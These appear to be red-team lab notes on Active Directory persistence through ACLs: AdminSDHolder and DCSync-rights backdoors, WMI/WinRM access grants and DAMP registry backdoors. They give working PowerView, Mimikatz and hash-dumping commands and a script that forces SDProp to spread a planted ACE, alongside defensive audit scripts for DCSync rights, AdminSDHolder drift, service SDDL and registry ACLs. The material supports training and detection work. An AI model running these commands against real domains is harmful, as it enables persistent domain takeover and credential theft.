Persistence ACLs
AdminSDHolder
Admin Security Descriptor Holder
AdminSDHolder is a container object in Active Directory that holds the security descriptor template for protected groups and their members. These groups carry elevated privileges and need extra protection, so the ACL of the AdminSDHolder object is applied automatically to every protected group and member: it keeps their permissions consistent and undoes any ACL change made directly on them.
It resides in the System container of the domain (CN=AdminSDHolder,CN=System,<domain DN>) and is used to control, through its ACL, the permissions of certain built-in privileged groups (the Protected Groups: Administrators, Domain Admins, Enterprise Admins, Schema Admins, Account Operators, Backup Operators, Server Operators, Print Operators and a few others, plus accounts such as Administrator and krbtgt).
The Security Descriptor Propagator (SDProp) runs on the PDC emulator every 60 minutes by default (the interval is the AdminSDProtectFrequency value under HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters). It compares the ACL of each protected group and member with the ACL of AdminSDHolder; any difference is overwritten on the object's ACL, inheritance is disabled on the object and its adminCount attribute is set to 1.
(Screenshots in the original: the ACLs and ACEs of a protected group as shown on the Security tab of the Administrators group and of the Backup Operators group)
Abuse
• Add FullControl permissions for a user on the AdminSDHolder object using PowerView, as Domain Admin (old Add-ObjectAcl syntax first, current Add-DomainObjectAcl syntax second)
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName <username> -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
• Or grant only WriteMembers (enough to change group membership and less conspicuous than FullControl), as Domain Admin
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName <username> -Rights WriteMembers -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student1 -Rights WriteMembers -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
The new ACE is copied onto the protected groups only when SDProp next runs (within 60 minutes by default).
• Check the permissions on Domain Admins using the ActiveDirectory module as a normal user (once SDProp has run, the ACE granted on AdminSDHolder shows up on the group)
(Get-Acl -Path 'AD:\CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ? {$_.IdentityReference -match '<username>'}
• Abuse FullControl (or WriteMembers) by adding a user to the Domain Admins group using PowerView_dev
Add-DomainGroupMember -Identity 'Domain Admins' -Members <username> -Verbose
• The same using the ActiveDirectory module
Add-ADGroupMember -Identity 'Domain Admins' -Members <username>
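Added example (written for these notes, not PowerView or original page code): the backdoor ACE only reaches the protected groups when SDProp next runs, so rather than waiting up to an hour, force a run and then confirm that the ACE now sits on Domain Admins. It assumes the ActiveDirectory module, Domain Admin rights (writing to the PDC emulator's rootDSE needs them) and the student1 account used above.

```powershell
# Added example: force an SDProp run and verify that the planted ACE propagated.
# Assumes the ActiveDirectory module and that we run as Domain Admin.
Import-Module ActiveDirectory

function Invoke-SDPropagator {
    # Server 2008+: writing runProtectAdminGroupsTask=1 to the PDC emulator's rootDSE
    # makes SDProp run immediately. It must be the PDCe, which owns the task.
    param([string]$Server = (Get-ADDomain).PDCEmulator)
    $rootDse = [ADSI]"LDAP://$Server/RootDSE"
    $rootDse.Put('runProtectAdminGroupsTask', '1')
    $rootDse.SetInfo()
}

function Get-ProtectedGroupAce {
    # Lists the ACEs a principal holds on a protected group. After SDProp has run, the
    # entries granted on AdminSDHolder appear here as non-inherited ACEs.
    param(
        [Parameter(Mandatory)][string]$Principal,   # sAMAccountName, e.g. student1
        [string]$Group = 'Domain Admins'
    )
    $dn      = (Get-ADGroup -Identity $Group).DistinguishedName
    $acl     = Get-Acl -Path "AD:\$dn"
    $pattern = '\\' + [regex]::Escape($Principal) + '$'   # match DOMAIN\student1 only
    $acl.Access |
        Where-Object { $_.IdentityReference.Value -match $pattern } |
        Select-Object IdentityReference, ActiveDirectoryRights, AccessControlType, IsInherited
}

# Usage (as Domain Admin on a domain-joined host):
Invoke-SDPropagator
Start-Sleep -Seconds 30                       # give the PDCe a moment to finish the pass
Get-ProtectedGroupAce -Principal 'student1'   # the GenericAll / WriteProperty ACE we planted
```

If the second command returns nothing, SDProp has not finished yet or the ACE was written to the wrong object: re-check the DN passed to Add-DomainObjectAcl before retrying.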
Rights Abuse (Persistence using ACLs)
With Domain Admin privileges, the ACL of the domain root can be modified to grant a controlled principal persistent rights such as FullControl over the domain object or the replication rights needed to run DCSync.
• Add FullControl permissions for a user to the ACL of the domain root using PowerView as Domain Admin
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName <username> -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
• Add FullControl permissions for a user to the ACL of the domain root using the ActiveDirectory module and Set-ADACL as Domain Admin
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal <username> -Verbose
Set-ADACL -SamAccountName studentuser1 -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose
• Add DCSync rights for a user to the ACL of the domain root using PowerView as Domain Admin
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalSamAccountName <username> -Rights DCSync -Verbose
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student1 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
• Add DCSync rights for a user to the ACL of the domain root using the ActiveDirectory module and Set-ADACL as Domain Admin
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal <username> -GUIDRight DCSync -Verbose
# DCSync = 3 extended rights on the domain object: Replicating Directory Changes, Replicating Directory Changes All, Replicating Directory Changes In Filtered Set (lsadump::dcsync needs the first two)
• Execute DCSync (works for any account, not only krbtgt; the krbtgt hash is what a Golden Ticket needs)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<Domain>\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<Domain>\Administrator"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
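Added example (not part of the original notes): the defensive counterpart of the commands above, enumerating every trustee on the domain root that holds the replication rights, either directly or through GenericAll / all-extended-rights, and deciding who can actually run lsadump::dcsync. The "expected" trustee list is an assumption about a default domain; it assumes the ActiveDirectory module and any domain user (the domain object's DACL is readable).

```powershell
# Added example: who can DCSync? Reads the domain root DACL and resolves the three
# replication extended rights. Assumes the ActiveDirectory module.
Import-Module ActiveDirectory

# Extended-right GUIDs of the replication permissions, as defined in the AD schema.
$ReplRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$ExtendedRight = 0x100      # ActiveDirectoryRights.ExtendedRight
$GenericAll    = 0xF01FF    # ActiveDirectoryRights.GenericAll (all bits set)
$AllObjects    = '00000000-0000-0000-0000-000000000000'   # ObjectType meaning "every extended right"

function Get-DCSyncRightHolder {
    # One record per (trustee, right) pair that can contribute to DCSync.
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)
    $acl = Get-Acl -Path "AD:\$DomainDN"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $mask = [int]$ace.ActiveDirectoryRights
        $type = $ace.ObjectType.ToString()
        $granted = @()
        if (($mask -band $GenericAll) -eq $GenericAll) {
            $granted += 'GenericAll'                      # implies every extended right
        } elseif (($mask -band $ExtendedRight) -ne 0) {
            if ($ReplRights.ContainsKey($type))  { $granted += $ReplRights[$type] }
            elseif ($type -eq $AllObjects)       { $granted += 'AllExtendedRights' }
        }
        foreach ($g in $granted) {
            [pscustomobject]@{ Identity = $ace.IdentityReference.Value; Right = $g }
        }
    }
}

function Get-DCSyncCapable {
    # Groups rights per trustee and checks for the pair lsadump::dcsync needs
    # (Get-Changes + Get-Changes-All) or for something that implies both.
    param([string]$DomainDN = (Get-ADDomain).DistinguishedName)
    $rights = @{}
    foreach ($r in Get-DCSyncRightHolder -DomainDN $DomainDN) {
        if (-not $rights.ContainsKey($r.Identity)) { $rights[$r.Identity] = @() }
        if ($rights[$r.Identity] -notcontains $r.Right) { $rights[$r.Identity] += $r.Right }
    }
    foreach ($id in $rights.Keys) {
        $set = $rights[$id]
        $can = ($set -contains 'GenericAll') -or ($set -contains 'AllExtendedRights') -or
               (($set -contains 'DS-Replication-Get-Changes') -and
                ($set -contains 'DS-Replication-Get-Changes-All'))
        [pscustomobject]@{
            Identity  = $id
            Rights    = ($set -join ', ')
            CanDCSync = $can
            # Assumed baseline: trustees that hold these rights on a default domain. Anything
            # else with CanDCSync = True (student1 from the notes, say) deserves a ticket.
            Expected  = [bool]($id -eq 'NT AUTHORITY\SYSTEM' -or
                        $id -match '\\(Administrators|Domain Admins|Enterprise Admins|Domain Controllers|Enterprise Domain Controllers|Enterprise Read-only Domain Controllers)$')
        }
    }
}

Get-DCSyncCapable | Where-Object CanDCSync | Sort-Object Expected | Format-Table -AutoSize
```

This lists direct trustees only: a user who gets the rights through membership in a group shown here is found by expanding that group (Get-ADGroupMember -Recursive), and a principal with WriteDacl on the domain object can grant itself the rights at any time, so review those ACEs with the same suspicion.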
Conclusion:
AdminSDHolder is a sneaky persistence method: an attacker who can edit its ACL keeps the ability to modify the most privileged groups in Active Directory by leveraging a core security component. Even if the permissions on a protected group or user are cleaned up, SDProp changes the security permissions back to match those of the AdminSDHolder object on its next run.
Detection:
Monitor the ACL configured on the AdminSDHolder object. It should be kept at the default; it is not usually necessary to add other principals to the AdminSDHolder ACL. With "Audit Directory Service Changes" enabled and a SACL on AdminSDHolder, every change to its nTSecurityDescriptor produces event ID 5136 (directory service object modified).
Monitor users and groups with AdminCount = 1 to identify accounts with ACLs set by SDProp.
Find all users and groups with security ACLs set by SDProp using the PowerShell AD cmdlets:
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter "(&(admincount=1)(|(objectcategory=person)(objectcategory=group)))" -Properties MemberOf,Created,Modified,AdminCount
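Added example (not from the original notes) that turns the two detection items above into checks that can run on a schedule: a diff of the AdminSDHolder ACL against a baseline captured on a known-good day, and a list of adminCount=1 users that are no longer in any protected group (SDProp never clears the flag, so such accounts keep the privileged ACL and no inheritance until someone resets them). The baseline path is an assumption; it assumes the ActiveDirectory module.

```powershell
# Added example: AdminSDHolder ACL drift + adminCount orphans. Assumes the ActiveDirectory
# module; the baseline file location is an assumption.
Import-Module ActiveDirectory

function Get-AdminSDHolderAce {
    # One normalized line per Allow ACE on AdminSDHolder, so the output diffs cleanly.
    $dn = "CN=AdminSDHolder,CN=System,$((Get-ADDomain).DistinguishedName)"
    (Get-Acl -Path "AD:\$dn").Access |
        Where-Object { $_.AccessControlType -eq 'Allow' } |
        ForEach-Object {
            '{0}|{1}|{2}|{3}' -f $_.IdentityReference.Value, $_.ActiveDirectoryRights,
                                  $_.ObjectType, $_.InheritedObjectType
        } | Sort-Object -Unique
}

function Save-AdminSDHolderBaseline {
    param([string]$Path = 'C:\Baselines\AdminSDHolder.txt')   # assumed location
    Get-AdminSDHolderAce | Set-Content -Path $Path -Encoding UTF8
}

function Compare-AdminSDHolderAcl {
    # Every ACE that appeared or disappeared since the baseline. An 'Added' line for an
    # ordinary user (DCORP\student1 with GenericAll, for instance) is the backdoor above.
    param([string]$Path = 'C:\Baselines\AdminSDHolder.txt')
    $baseline = @(Get-Content -Path $Path)
    $current  = @(Get-AdminSDHolderAce)
    Compare-Object -ReferenceObject $baseline -DifferenceObject $current | ForEach-Object {
        $change = if ($_.SideIndicator -eq '=>') { 'Added' } else { 'Removed' }
        [pscustomobject]@{ Change = $change; Ace = $_.InputObject }
    }
}

function Get-AdminCountOrphan {
    # Users flagged adminCount=1 that are not (directly or via nesting) in any protected
    # group. Protected groups carry adminCount=1 themselves, which is how we find them;
    # krbtgt is protected directly rather than through a group, so it is excluded.
    $protectedGroups = Get-ADGroup -LDAPFilter '(adminCount=1)'
    $members = foreach ($g in $protectedGroups) {
        Get-ADGroupMember -Identity $g -Recursive | Select-Object -ExpandProperty DistinguishedName
    }
    Get-ADUser -LDAPFilter '(adminCount=1)' -Properties adminCount, whenChanged |
        Where-Object { $_.SamAccountName -ne 'krbtgt' -and $members -notcontains $_.DistinguishedName } |
        Select-Object SamAccountName, DistinguishedName, whenChanged
}

# First run on a clean domain: Save-AdminSDHolderBaseline
# Scheduled runs:
Compare-AdminSDHolderAcl | Format-Table -AutoSize
Get-AdminCountOrphan     | Format-Table -AutoSize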
Resources
https://adsecurity.org/?p=1906
https://blog.harmj0y.net/redteaming/abusing-active-directory-permissions-with-powerview/
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence
https://github.com/jwardsmith/Active-Directory-Exploitation#rights-abuse-persistence-using-acls
Security Descriptors
Security Descriptor Definition Language (SDDL) defines the string format used to describe a security descriptor (owner O:, primary group G:, DACL D: and SACL S:). Each entry of the DACL and SACL is an ACE string of the form
ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
EX: A;CI;CCDCLCSWRPWPRCWD;;;SID
Here A is an access-allowed ACE, CI means the ACE is inherited by child containers, the rights field is a list of two-letter codes (CC create child, DC delete child, LC list children, SW self write, RP read property, WP write property, RC read control, WD write DAC), the two empty fields are the object and inherited-object GUIDs (used only by object ACEs in AD) and the last field is the trustee's SID or a well-known alias such as BA or SY.
A security descriptor stores which principals have which permissions over a securable object (an AD object, a service, a registry key, a file). A small change to the security descriptor of an object can therefore grant very interesting privileges over it without being a member of any privileged group.
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/security-descriptors
What are DACLs, SACLs and ACEs?
https://docs.netapp.com/us-en/ontap/smb-admin/security-descriptors-apply-file-folder-security-concept.html
Abuse
→ Show the SDDL of a service
sc.exe sdshow <service>
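Added example (not from the original notes): the DACL that sc.exe sdshow prints is hard to read by eye, so this decodes it into named service rights and flags ACEs that allow a takeover (reconfigure, start/stop, rewrite the DACL or owner). The sample SDDL is constructed for the example; the rights table is the standard service access mask from winsvc.h.

```powershell
# Added example: decode a service SDDL (sc.exe sdshow output) into readable rights.
# Service-specific access bits (winsvc.h) plus the standard rights that appear in service
# DACLs; the two-letter codes are the SDDL abbreviations sdshow prints.
$ServiceRights = [ordered]@{
    0x00001 = 'SERVICE_QUERY_CONFIG (CC)'
    0x00002 = 'SERVICE_CHANGE_CONFIG (DC)'
    0x00004 = 'SERVICE_QUERY_STATUS (LC)'
    0x00008 = 'SERVICE_ENUMERATE_DEPENDENTS (SW)'
    0x00010 = 'SERVICE_START (RP)'
    0x00020 = 'SERVICE_STOP (WP)'
    0x00040 = 'SERVICE_PAUSE_CONTINUE (DT)'
    0x00080 = 'SERVICE_INTERROGATE (LO)'
    0x00100 = 'SERVICE_USER_DEFINED_CONTROL (CR)'
    0x10000 = 'DELETE (SD)'
    0x20000 = 'READ_CONTROL (RC)'
    0x40000 = 'WRITE_DAC (WD)'
    0x80000 = 'WRITE_OWNER (WO)'
}
# Rights that let a trustee take over the service: repoint binPath (DC), start/stop it
# (RP/WP), or rewrite the DACL/owner and grant themselves the rest (WD/WO).
$TakeoverMask = 0x2 -bor 0x10 -bor 0x20 -bor 0x40000 -bor 0x80000

function Get-ServiceSddl {
    # Wraps sc.exe; the SDDL is the only output line that starts with 'D:'.
    param([Parameter(Mandatory)][string]$Name)
    (sc.exe sdshow $Name | Where-Object { $_ -match '^\s*D:' }).Trim()
}

function ConvertFrom-ServiceSddl {
    param([Parameter(Mandatory)][string]$Sddl)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid = $ace.SecurityIdentifier
        try   { $who = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $who = $sid.Value }                # unresolvable (foreign/deleted) SID
        $mask  = $ace.AccessMask
        $names = foreach ($bit in $ServiceRights.Keys) { if ($mask -band $bit) { $ServiceRights[$bit] } }
        [pscustomobject]@{
            Type      = $ace.AceType               # AccessAllowed / AccessDenied
            Principal = $who
            Mask      = '0x{0:X}' -f $mask
            Rights    = ($names -join ', ')
            # Allow ACEs carrying takeover bits; whether that is a finding depends on who
            # the principal is (BUILTIN\Administrators: fine; Everyone or a plain user: not).
            Takeover  = ($ace.AceType -eq 'AccessAllowed') -and (($mask -band $TakeoverMask) -ne 0)
        }
    }
}

# Constructed sample: the usual SYSTEM / Administrators / Interactive entries plus a
# fourth ACE that grants Everyone (WD) full control, the classic misconfiguration.
$Sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)' +
          '(A;;CCLCSWLOCRRC;;;IU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
ConvertFrom-ServiceSddl -Sddl $Sample | Format-Table -AutoSize
# Live: ConvertFrom-ServiceSddl -Sddl (Get-ServiceSddl -Name 'Spooler') | Where-Object Takeover
```

The same RawSecurityDescriptor parsing works for any SDDL string, including the nTSecurityDescriptor SDDL that event 5136 logs for AD objects; only the rights table differs per object type.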
• Give our user the ability to run WMI queries against a target machine (e.g. a Domain Controller) without administrative privileges, configured through the GUI as a Domain Admin. Two permissions are needed: the user must be allowed to connect to the DCOM endpoint, and must be allowed to connect to the WMI namespace.
DCOM endpoint: Start Menu -> Component Services -> Computers -> My Computer -> Properties -> COM Security tab -> Access Permissions -> Edit Limits -> Add our user -> Allow everything
Namespace: Start Menu -> Computer Management -> Services and Applications -> WMI Control -> Properties -> Security tab -> Root -> Security -> Add our user -> Allow everything -> Advanced -> select our user -> Edit -> Applies to 'This namespace and subnamespaces'
→ The same from PowerShell with Set-RemoteWMI, on a remote machine with explicit credentials; this grants only root\cimv2 and its nested namespaces
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
Access to WinRM
• Give our user the ability to use PowerShell Remoting against a target machine (e.g. a Domain Controller) without administrative privileges, by modifying the ACLs that gate non-admin access to the securable objects involved, as Domain Admin. Tooling: RACE.ps1 over PS remoting (note: not stable after the August 2020 patches).
• Access the registry and dump hashes through a registry backdoor created with DAMP: it changes registry ACLs so that a chosen user can, at any later time, remotely retrieve the machine account hash, the local SAM hashes and the domain cached credentials of the computer. Granting this to a regular user against a Domain Controller is therefore very useful for persistence.
→ Using RACE or DAMP, with admin privileges on the remote machine, plant the backdoor that allows remote retrieval of the system's machine and local account hashes and its domain cached credentials
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose
→ As student1, abuse the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash of the specified machine
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
→ Same backdoor, retrieve the local SAM account hashes
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose
→ Same backdoor, retrieve the domain cached credentials
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose
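Added example (not DAMP's code and not from the original notes): an audit of the ACLs on the registry keys a remote hash-dumping backdoor must be able to read, namely the SAM and SECURITY hives and the four LSA subkeys whose class names form the boot key. It runs over Remote Registry, needs admin rights on the target (non-admins cannot read these DACLs), and the "expected trustees" list is an assumption about a default install; judge inherited read ACEs against your own baseline.

```powershell
# Added example: find unexpected trustees on the registry keys needed to dump hashes.
# Assumes admin on the target and a reachable Remote Registry service.
$SensitiveKeys = @(
    'SAM\SAM',                                   # local account hashes
    'SECURITY',                                  # LSA secrets ($MACHINE.ACC) and cached domain creds
    'SYSTEM\CurrentControlSet\Control\Lsa\JD',   # these four keys' class names form the boot key
    'SYSTEM\CurrentControlSet\Control\Lsa\Skew1',
    'SYSTEM\CurrentControlSet\Control\Lsa\GBG',
    'SYSTEM\CurrentControlSet\Control\Lsa\Data'
)
# Assumed baseline of legitimate trustees; anything else with an Allow ACE gets flagged.
$ExpectedTrustees = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER')

function Get-SensitiveKeyAce {
    param([string]$ComputerName = $env:COMPUTERNAME)
    $hklm = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey(
                [Microsoft.Win32.RegistryHive]::LocalMachine, $ComputerName)
    foreach ($path in $SensitiveKeys) {
        try {
            # Open for ReadPermissions only: we want the DACL, not the (protected) contents.
            $key = $hklm.OpenSubKey($path,
                       [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadSubTree,
                       [System.Security.AccessControl.RegistryRights]::ReadPermissions)
            if ($null -eq $key) { throw 'key not found' }
            $rules = $key.GetAccessControl().GetAccessRules($true, $true,
                         [System.Security.Principal.SecurityIdentifier])
            foreach ($r in $rules) {
                $sid = $r.IdentityReference
                try   { $who = $sid.Translate([System.Security.Principal.NTAccount]).Value }
                catch { $who = $sid.Value }       # remote-local or deleted SID
                [pscustomobject]@{
                    Computer   = $ComputerName
                    Key        = "HKLM\$path"
                    Trustee    = $who
                    Rights     = $r.RegistryRights
                    Type       = $r.AccessControlType
                    Inherited  = $r.IsInherited
                    Unexpected = ($r.AccessControlType -eq 'Allow') -and
                                 ($ExpectedTrustees -notcontains $who)
                    Error      = $null
                }
            }
            $key.Close()
        } catch {
            [pscustomobject]@{
                Computer = $ComputerName; Key = "HKLM\$path"; Trustee = $null; Rights = $null
                Type = $null; Inherited = $null; Unexpected = $null; Error = $_.Exception.Message
            }
        }
    }
    $hklm.Close()
}

Get-SensitiveKeyAce -ComputerName 'dcorp-dc' |
    Where-Object { $_.Unexpected -or $_.Error } | Format-Table -AutoSize
```

A non-inherited Allow ACE for a plain domain user on SAM\SAM or SECURITY is exactly what the backdoor above leaves behind; an 'Error' row (access denied) on the same keys as an administrator usually means the hive ACL has been tampered with in the other direction.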
Resources
https://github.com/jwardsmith/Active-Directory-Exploitation#rights-abuse-persistence-using-acls